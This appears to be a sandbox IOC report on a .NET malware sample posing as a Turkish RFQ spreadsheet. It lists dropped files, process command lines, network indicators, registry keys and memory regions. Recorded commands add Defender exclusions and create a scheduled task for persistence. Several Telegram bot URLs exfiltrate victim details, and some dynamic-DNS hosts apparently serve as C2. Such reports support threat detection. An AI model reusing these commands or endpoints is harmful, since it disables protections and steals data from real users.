IOC Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

loading gif

Files

File Path
Type
Category
Malicious
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\qovDEn.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\qovDEn.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qovDEn.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbwejyd.2q3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwxsesfe.vsy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4o5ji5g.0wd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3v321xo.qac.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuxsommc.0ve.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te0ocm1v.dqo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0gbpkkv.ys4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr3025qc.miz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp
XML 1.0 document, ASCII text
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"
malicious
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
malicious
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
malicious
C:\Users\user\AppData\Roaming\qovDEn.exe
C:\Users\user\AppData\Roaming\qovDEn.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"
malicious
C:\Users\user\AppData\Roaming\qovDEn.exe
"C:\Users\user\AppData\Roaming\qovDEn.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.office.com/
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://api.telegram.org/bot
unknown
http://tempuri.org/DataSet1.xsd
unknown
https://www.office.com/lB
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://checkip.dyndns.org
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.97.3
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
http://varders.kozow.com:8081
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://checkip.dyndns.org/
158.101.44.242
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://anotherarmy.dns.army:8081
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://checkip.dyndns.org/q
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://reallyfreegeoip.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a
unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
checkip.dyndns.com
158.101.44.242

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
158.101.44.242
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3FC6000
trusted library allocation
page read and write
malicious
33A1000
trusted library allocation
page read and write
malicious
3061000
trusted library allocation
page read and write
malicious
4185000
trusted library allocation
page read and write
malicious
432000
remote allocation
page execute and read and write
malicious
434000
remote allocation
page execute and read and write
malicious
3169000
trusted library allocation
page read and write
1308000
heap
page read and write
2FAF000
stack
page read and write
671E000
stack
page read and write
1170000
heap
page read and write
5DE0000
trusted library allocation
page read and write
3040000
heap
page read and write
3359000
trusted library allocation
page read and write
744E000
stack
page read and write
2D6C000
stack
page read and write
34AA000
trusted library allocation
page read and write
5B4A000
trusted library allocation
page read and write
6280000
heap
page read and write
585D000
stack
page read and write
6C28000
trusted library allocation
page read and write
3221000
trusted library allocation
page read and write
1700000
heap
page read and write
3243000
trusted library allocation
page read and write
1422000
trusted library allocation
page read and write
5DC0000
trusted library allocation
page read and write
129C000
heap
page read and write
12A5000
heap
page read and write
16F0000
trusted library allocation
page read and write
57DE000
stack
page read and write
53B0000
trusted library allocation
page read and write
71C0000
trusted library allocation
page execute and read and write
3117000
trusted library allocation
page read and write
4597000
trusted library allocation
page read and write
58EE000
stack
page read and write
3154000
trusted library allocation
page read and write
36A5000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
2D10000
trusted library allocation
page read and write
C28C000
stack
page read and write
4746000
trusted library allocation
page read and write
3411000
trusted library allocation
page read and write
6228000
heap
page read and write
1204000
trusted library allocation
page read and write
BC4E000
stack
page read and write
1110000
heap
page read and write
77EE000
stack
page read and write
4148000
trusted library allocation
page read and write
3452000
trusted library allocation
page read and write
32B2000
trusted library allocation
page read and write
47AB000
trusted library allocation
page read and write
43A1000
trusted library allocation
page read and write
30AF000
trusted library allocation
page read and write
72A7000
trusted library allocation
page read and write
59B0000
trusted library allocation
page read and write
3446000
trusted library allocation
page read and write
1678000
heap
page read and write
2A6D000
stack
page read and write
2FD4000
trusted library allocation
page read and write
7320000
heap
page read and write
3561000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
5550000
trusted library allocation
page read and write
3102000
trusted library allocation
page read and write
5AEE000
stack
page read and write
2B5E000
unkown
page read and write
2FD6000
trusted library allocation
page read and write
58E0000
heap
page read and write
11A5000
heap
page read and write
4230000
trusted library allocation
page read and write
124F000
heap
page read and write
1040000
heap
page read and write
44B0000
trusted library allocation
page read and write
665E000
stack
page read and write
433B000
trusted library allocation
page read and write
440000
remote allocation
page execute and read and write
30D5000
trusted library allocation
page read and write
3100000
trusted library allocation
page read and write
5980000
trusted library allocation
page execute and read and write
1120000
heap
page read and write
3113000
trusted library allocation
page read and write
1160000
heap
page read and write
13AE000
stack
page read and write
35F3000
trusted library allocation
page read and write
78F5000
trusted library allocation
page read and write
6DD0000
heap
page read and write
65DE000
stack
page read and write
120D000
trusted library allocation
page execute and read and write
4089000
trusted library allocation
page read and write
3618000
trusted library allocation
page read and write
5750000
heap
page execute and read and write
6C80000
trusted library allocation
page execute and read and write
3010000
trusted library allocation
page read and write
4246000
trusted library allocation
page read and write
5846000
trusted library allocation
page read and write
441F000
trusted library allocation
page read and write
2D45000
trusted library allocation
page execute and read and write
4209000
trusted library allocation
page read and write
4ED8000
trusted library allocation
page read and write
16C0000
heap
page read and write
472A000
trusted library allocation
page read and write
695F000
stack
page read and write
B650000
heap
page read and write
446C000
trusted library allocation
page read and write
419D000
trusted library allocation
page read and write
444C000
trusted library allocation
page read and write
61C4000
heap
page read and write
584E000
trusted library allocation
page read and write
3583000
trusted library allocation
page read and write
13B0000
heap
page read and write
3103000
trusted library allocation
page read and write
61E7000
heap
page read and write
1512000
trusted library allocation
page read and write
3080000
heap
page execute and read and write
813D000
stack
page read and write
3050000
heap
page execute and read and write
3216000
trusted library allocation
page read and write
515E000
stack
page read and write
1618000
trusted library allocation
page read and write
4402000
trusted library allocation
page read and write
55E3000
heap
page read and write
4373000
trusted library allocation
page read and write
DF0000
heap
page read and write
2E2F000
stack
page read and write
43C9000
trusted library allocation
page read and write
15FD000
trusted library allocation
page execute and read and write
369D000
trusted library allocation
page read and write
2E8F000
stack
page read and write
5620000
heap
page read and write
33FB000
trusted library allocation
page read and write
549E000
stack
page read and write
2D90000
trusted library allocation
page read and write
BA0000
unkown
page readonly
6C26000
trusted library allocation
page read and write
58D0000
heap
page read and write
2F00000
heap
page read and write
7B40000
trusted library allocation
page execute and read and write
328C000
stack
page read and write
1420000
trusted library allocation
page read and write
442A000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
DB0000
heap
page read and write
680D000
heap
page read and write
31D7000
trusted library allocation
page read and write
53E0000
trusted library allocation
page read and write
2D2E000
stack
page read and write
2DDF000
unkown
page read and write
369F000
trusted library allocation
page read and write
122E000
heap
page read and write
40E0000
trusted library allocation
page read and write
2E30000
heap
page read and write
41BD000
trusted library allocation
page read and write
618E000
heap
page read and write
11A8000
heap
page read and write
5573000
heap
page read and write
4171000
trusted library allocation
page read and write
2FD1000
trusted library allocation
page read and write
B9AF000
stack
page read and write
320E000
trusted library allocation
page read and write
4432000
trusted library allocation
page read and write
345A000
trusted library allocation
page read and write
5B24000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
153A000
heap
page read and write
7300000
heap
page read and write
43BB000
trusted library allocation
page read and write
2FCE000
trusted library allocation
page read and write
5430000
trusted library allocation
page read and write
7F8D0000
trusted library allocation
page execute and read and write
7293000
trusted library allocation
page read and write
14BF000
stack
page read and write
71E0000
trusted library allocation
page read and write
30C7000
trusted library allocation
page read and write
4283000
trusted library allocation
page read and write
4407000
trusted library allocation
page read and write
1450000
trusted library allocation
page read and write
4716000
trusted library allocation
page read and write
2D40000
trusted library allocation
page read and write
BEEE000
stack
page read and write
7C0E000
stack
page read and write
4655000
trusted library allocation
page read and write
310A000
trusted library allocation
page execute and read and write
40C8000
trusted library allocation
page read and write
5ADE000
stack
page read and write
2D32000
trusted library allocation
page read and write
6A5E000
stack
page read and write
441000
remote allocation
page execute and read and write
7770000
heap
page read and write
71D0000
trusted library allocation
page execute and read and write
5DD0000
trusted library allocation
page execute and read and write
71EA000
trusted library allocation
page read and write
1426000
trusted library allocation
page execute and read and write
2DB0000
trusted library allocation
page read and write
8B5E000
stack
page read and write
45C2000
trusted library allocation
page read and write
32D2000
trusted library allocation
page read and write
5710000
trusted library allocation
page read and write
5866000
trusted library allocation
page read and write
12A7000
heap
page read and write
6AE2000
heap
page read and write
6187000
heap
page read and write
43AF000
trusted library allocation
page read and write
31AB000
trusted library allocation
page read and write
2FBB000
trusted library allocation
page read and write
2FD6000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
343E000
trusted library allocation
page read and write
3270000
trusted library allocation
page read and write
6DE0000
heap
page read and write
442000
remote allocation
page execute and read and write
5570000
heap
page read and write
55D0000
heap
page execute and read and write
43F6000
trusted library allocation
page read and write
67B8000
heap
page read and write
59B5000
trusted library allocation
page read and write
336B000
trusted library allocation
page read and write
70DF000
stack
page read and write
16B0000
trusted library allocation
page read and write
32E1000
trusted library allocation
page read and write
5970000
trusted library allocation
page read and write
2D36000
trusted library allocation
page execute and read and write
789A000
trusted library allocation
page read and write
3365000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
141D000
trusted library allocation
page execute and read and write
B54E000
stack
page read and write
3115000
trusted library allocation
page execute and read and write
3110000
trusted library allocation
page read and write
5720000
trusted library allocation
page execute and read and write
40E5000
trusted library allocation
page read and write
415E000
trusted library allocation
page read and write
681E000
stack
page read and write
6D5E000
stack
page read and write
3315000
trusted library allocation
page read and write
7280000
trusted library allocation
page execute and read and write
6D80000
trusted library allocation
page read and write
31A0000
heap
page read and write
5840000
trusted library allocation
page read and write
53D6000
trusted library allocation
page read and write
29DD000
stack
page read and write
1645000
heap
page read and write
14E0000
trusted library allocation
page execute and read and write
2D4B000
trusted library allocation
page execute and read and write
78A0000
trusted library allocation
page read and write
469D000
trusted library allocation
page read and write
BECE000
stack
page read and write
1410000
trusted library allocation
page read and write
3659000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
61DF000
stack
page read and write
56E0000
trusted library allocation
page execute and read and write
6C60000
trusted library allocation
page read and write
695E000
stack
page read and write
40CF000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
14ED000
trusted library allocation
page execute and read and write
2D14000
trusted library allocation
page read and write
1200000
trusted library allocation
page read and write
3091000
trusted library allocation
page read and write
151B000
trusted library allocation
page execute and read and write
BD8E000
stack
page read and write
B98E000
stack
page read and write
42D000
remote allocation
page execute and read and write
36A3000
trusted library allocation
page read and write
DE7000
stack
page read and write
2DE0000
heap
page read and write
14F0000
trusted library allocation
page read and write
3050000
trusted library allocation
page execute and read and write
40D6000
trusted library allocation
page read and write
3F68000
trusted library allocation
page read and write
7792000
heap
page read and write
36A9000
trusted library allocation
page read and write
5A5E000
stack
page read and write
11F0000
trusted library allocation
page read and write
15E0000
trusted library allocation
page read and write
BBB0000
heap
page read and write
59BA000
trusted library allocation
page read and write
119E000
stack
page read and write
14E0000
trusted library allocation
page read and write
170A000
heap
page read and write
6F5E000
stack
page read and write
5820000
trusted library allocation
page read and write
42A2000
trusted library allocation
page read and write
5413000
heap
page read and write
6816000
heap
page read and write
6CA0000
trusted library allocation
page execute and read and write
364F000
trusted library allocation
page read and write
5AFD000
stack
page read and write
3020000
trusted library allocation
page read and write
4412000
trusted library allocation
page read and write
2FF6000
trusted library allocation
page read and write
D60000
heap
page read and write
4833000
trusted library allocation
page read and write
6A9E000
stack
page read and write
45E1000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3F88000
trusted library allocation
page read and write
57E0000
trusted library allocation
page execute and read and write
435E000
trusted library allocation
page read and write
2D1D000
trusted library allocation
page execute and read and write
54FD000
stack
page read and write
40EB000
trusted library allocation
page read and write
5480000
heap
page read and write
6D4E000
stack
page read and write
4846000
trusted library allocation
page read and write
3107000
trusted library allocation
page read and write
40F4000
trusted library allocation
page read and write
1210000
heap
page read and write
3130000
trusted library allocation
page read and write
1517000
trusted library allocation
page execute and read and write
2CD0000
heap
page read and write
6160000
heap
page read and write
53BB000
trusted library allocation
page read and write
B34E000
stack
page read and write
53F0000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
361B000
trusted library allocation
page read and write
11A0000
heap
page read and write
586D000
trusted library allocation
page read and write
61CA000
heap
page read and write
2D30000
trusted library allocation
page read and write
6C90000
trusted library allocation
page execute and read and write
72C0000
trusted library allocation
page execute and read and write
3060000
trusted library allocation
page read and write
5740000
trusted library allocation
page read and write
5410000
heap
page read and write
5B50000
trusted library allocation
page read and write
10F7000
stack
page read and write
2F7C000
trusted library allocation
page read and write
339E000
stack
page read and write
2D60000
trusted library allocation
page read and write
3117000
trusted library allocation
page execute and read and write
330F000
trusted library allocation
page read and write
5DBE000
stack
page read and write
31A9000
trusted library allocation
page read and write
43B4000
trusted library allocation
page read and write
43B000
remote allocation
page execute and read and write
5806000
trusted library allocation
page read and write
444000
remote allocation
page execute and read and write
62DE000
stack
page read and write
32DB000
trusted library allocation
page read and write
43FD000
trusted library allocation
page read and write
344A000
trusted library allocation
page read and write
4482000
trusted library allocation
page read and write
110A000
stack
page read and write
669E000
stack
page read and write
59C0000
trusted library allocation
page read and write
2F84000
trusted library allocation
page read and write
41D000
remote allocation
page execute and read and write
6D70000
trusted library allocation
page read and write
335C000
trusted library allocation
page read and write
2D42000
trusted library allocation
page read and write
334B000
trusted library allocation
page read and write
3290000
heap
page execute and read and write
7F300000
trusted library allocation
page execute and read and write
30D9000
trusted library allocation
page read and write
2B9F000
unkown
page read and write
BEAE000
stack
page read and write
324D000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
5860000
heap
page read and write
6226000
heap
page read and write
573B000
stack
page read and write
42B8000
trusted library allocation
page read and write
D3A000
stack
page read and write
11B5000
heap
page read and write
649E000
stack
page read and write
617E000
stack
page read and write
1180000
heap
page read and write
2D80000
trusted library allocation
page read and write
1115000
heap
page read and write
441B000
trusted library allocation
page read and write
68DD000
stack
page read and write
14E3000
trusted library allocation
page execute and read and write
2C80000
heap
page read and write
423000
remote allocation
page execute and read and write
56D0000
trusted library allocation
page read and write
16D0000
trusted library allocation
page read and write
5B3E000
stack
page read and write
7754000
trusted library allocation
page read and write
2FEA000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
402000
remote allocation
page execute and read and write
719E000
stack
page read and write
344E000
trusted library allocation
page read and write
6C30000
trusted library allocation
page execute and read and write
2FCC000
stack
page read and write
2FDE000
trusted library allocation
page read and write
6AB4000
heap
page read and write
4148000
trusted library allocation
page read and write
7DCF000
stack
page read and write
58E4000
heap
page read and write
16E0000
trusted library allocation
page read and write
2D9E000
unkown
page read and write
54A0000
trusted library allocation
page read and write
3552000
trusted library allocation
page read and write
6D90000
trusted library allocation
page execute and read and write
1150000
heap
page read and write
30E5000
trusted library allocation
page read and write
80FD000
stack
page read and write
6F1E000
stack
page read and write
6D1E000
stack
page read and write
3180000
heap
page read and write
354E000
trusted library allocation
page read and write
311B000
trusted library allocation
page execute and read and write
5810000
trusted library allocation
page read and write
71A0000
trusted library allocation
page execute and read and write
D97000
stack
page read and write
506C000
stack
page read and write
30FD000
trusted library allocation
page execute and read and write
6C70000
trusted library allocation
page execute and read and write
3456000
trusted library allocation
page read and write
5560000
heap
page execute and read and write
77AE000
stack
page read and write
709E000
stack
page read and write
3419000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
1500000
heap
page read and write
DD0000
heap
page read and write
421000
remote allocation
page execute and read and write
12AB000
heap
page read and write
2E74000
trusted library allocation
page read and write
6CDE000
stack
page read and write
5B1E000
stack
page read and write
786D000
stack
page read and write
6AF4000
heap
page read and write
6DA0000
trusted library allocation
page read and write
5B00000
trusted library section
page readonly
4185000
trusted library allocation
page read and write
3361000
trusted library allocation
page read and write
71B0000
trusted library allocation
page execute and read and write
7764000
heap
page read and write
5F80000
heap
page read and write
7352000
trusted library allocation
page read and write
782E000
stack
page read and write
5AF0000
trusted library section
page read and write
5990000
trusted library allocation
page read and write
2FDD000
trusted library allocation
page read and write
BFCE000
stack
page read and write
4735000
trusted library allocation
page read and write
331B000
trusted library allocation
page read and write
143B000
trusted library allocation
page execute and read and write
6C50000
trusted library allocation
page execute and read and write
651E000
stack
page read and write
6ADF000
stack
page read and write
B44E000
stack
page read and write
5450000
heap
page read and write
5B60000
trusted library allocation
page execute and read and write
2FFD000
trusted library allocation
page read and write
3653000
trusted library allocation
page read and write
15F3000
trusted library allocation
page execute and read and write
DA0000
heap
page read and write
3145000
trusted library allocation
page read and write
7C40000
trusted library section
page read and write
6D9E000
stack
page read and write
1304000
heap
page read and write
3214000
trusted library allocation
page read and write
31A4000
trusted library allocation
page read and write
6B25000
heap
page read and write
CEA000
stack
page read and write
5490000
trusted library allocation
page execute and read and write
2BA0000
heap
page read and write
3592000
trusted library allocation
page read and write
BFEE000
stack
page read and write
5800000
trusted library allocation
page read and write
78F0000
trusted library allocation
page read and write
685E000
stack
page read and write
11BE000
heap
page read and write
2EBE000
stack
page read and write
BB0B000
stack
page read and write
B88E000
stack
page read and write
4874000
trusted library allocation
page read and write
2AAA000
stack
page read and write
6A9E000
stack
page read and write
655E000
stack
page read and write
140F000
stack
page read and write
1502000
trusted library allocation
page read and write
45F6000
trusted library allocation
page read and write
122B000
heap
page read and write
2D47000
trusted library allocation
page execute and read and write
3613000
trusted library allocation
page read and write
5B70000
heap
page execute and read and write
2FCC000
trusted library allocation
page read and write
3309000
trusted library allocation
page read and write
32D8000
trusted library allocation
page read and write
2D70000
trusted library allocation
page execute and read and write
641E000
stack
page read and write
43E5000
trusted library allocation
page read and write
33EF000
trusted library allocation
page read and write
6290000
heap
page read and write
7750000
heap
page read and write
3245000
trusted library allocation
page read and write
1237000
heap
page read and write
2E80000
heap
page read and write
C2CD000
stack
page read and write
2DEE000
stack
page read and write
2D13000
trusted library allocation
page execute and read and write
3ED1000
trusted library allocation
page read and write
1195000
heap
page read and write
2D2D000
trusted library allocation
page execute and read and write
3415000
trusted library allocation
page read and write
1155000
heap
page read and write
456F000
trusted library allocation
page read and write
3587000
trusted library allocation
page read and write
53CE000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
10D0000
heap
page read and write
2E50000
trusted library allocation
page execute and read and write
473C000
trusted library allocation
page read and write
6AA0000
heap
page read and write
4424000
trusted library allocation
page read and write
2ED1000
trusted library allocation
page read and write
682C000
heap
page read and write
10F0000
heap
page read and write
1610000
heap
page read and write
57F0000
trusted library allocation
page read and write
77DA000
heap
page read and write
2DB0000
heap
page execute and read and write
61C7000
heap
page read and write
2E4E000
stack
page read and write
2B10000
heap
page read and write
577B000
stack
page read and write
5A9E000
stack
page read and write
2CA0000
heap
page read and write
47C1000
trusted library allocation
page read and write
6D77000
trusted library allocation
page read and write
14F7000
stack
page read and write
6D00000
trusted library allocation
page read and write
2E00000
heap
page read and write
14FD000
trusted library allocation
page execute and read and write
53F5000
trusted library allocation
page read and write
121B000
heap
page read and write
2DAE000
stack
page read and write
57E0000
heap
page read and write
659E000
stack
page read and write
6D50000
trusted library allocation
page execute and read and write
C9A000
stack
page read and write
6BDE000
stack
page read and write
3485000
trusted library allocation
page read and write
5B46000
trusted library allocation
page read and write
3252000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
11D7000
heap
page read and write
43C000
remote allocation
page execute and read and write
2E70000
trusted library allocation
page read and write
4316000
trusted library allocation
page read and write
1255000
heap
page read and write
2C3A000
stack
page read and write
4870000
trusted library allocation
page read and write
1639000
heap
page read and write
4407000
trusted library allocation
page read and write
117E000
heap
page read and write
6B1E000
stack
page read and write
14D0000
trusted library allocation
page read and write
1170000
heap
page read and write
585A000
trusted library allocation
page read and write
432C000
trusted library allocation
page read and write
30BC000
trusted library allocation
page read and write
1506000
trusted library allocation
page execute and read and write
11CA000
heap
page read and write
2F25000
trusted library allocation
page read and write
C18B000
stack
page read and write
6C40000
trusted library allocation
page read and write
323F000
trusted library allocation
page read and write
4428000
trusted library allocation
page read and write
1500000
trusted library allocation
page read and write
1600000
heap
page read and write
4584000
trusted library allocation
page read and write
3649000
trusted library allocation
page read and write
11DE000
stack
page read and write
2D20000
trusted library allocation
page read and write
6C1F000
stack
page read and write
BAAF000
stack
